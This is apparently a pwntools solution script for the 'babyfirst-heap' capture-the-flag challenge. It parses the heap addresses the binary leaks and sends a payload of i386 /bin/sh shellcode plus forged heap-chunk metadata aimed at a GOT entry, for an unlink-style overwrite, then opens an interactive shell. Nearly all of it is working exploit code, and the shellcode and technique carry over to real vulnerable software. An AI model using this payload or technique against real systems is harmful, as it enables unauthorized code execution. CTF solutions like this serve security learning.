#!/usr/bin/env python2

from pwn import *

# Setup goodies
context(os = 'linux', arch = 'i386')
elf = ELF('./babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c')

r = process('./babyfirst-heap_33ecf0ad56efc1b322088f95dd98827c')

# Skip header
r.recvuntil('address.\n')

# Receive the heap locations
addrs = []
for n in range(20):
    r.recvuntil('loc=')
    loc = r.recvuntil(']')[:-1]
    addrs.append(int(loc, 16))
    r.recvline()

shellcode = "\x31\xd2\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x52\x53\x89\xe1\x8d\x42\x0b\xcd\x80"

sc = "\xeb\x08" + '\x00'*8 + shellcode.ljust(250, '\x00') + p32(0xfffffffd) + p32(0x0804C004-8) + p32(addrs[10])
r.send(sc)

# GO!
r.clean()
r.interactive()